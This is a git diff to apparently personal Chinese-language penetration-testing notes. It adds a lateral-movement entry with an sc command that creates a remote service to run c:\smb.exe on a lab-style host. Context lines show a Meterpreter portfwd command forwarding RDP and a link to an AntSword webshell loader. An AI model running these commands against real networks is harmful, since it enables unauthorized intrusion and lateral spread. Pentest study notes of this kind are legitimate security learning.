--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -198,6 +198,18 @@ https://github.com/AntSwordProject/AntSword-Loader
 
 
 
+### 横向移动：
+
+方式：
+
+
+
+命令行创建服务
+
+sc\owa.god.org create test binpath="cmd.exe /c c:\smb.exe"
+
+
+
 ## 渗透测试
 
 
@@ -229,7 +241,7 @@ Vegil
 需要一个带公网IP的服务器
 
 portfwd 映射端口
- 
+
  192.168.1.53 源  目标需要被映射的地址 192.168.1.119 
 
  portfwd   add  -L  192.168.1.53  ‐ l   33389   ‐ r   192.168.1.119   ‐ p 3389
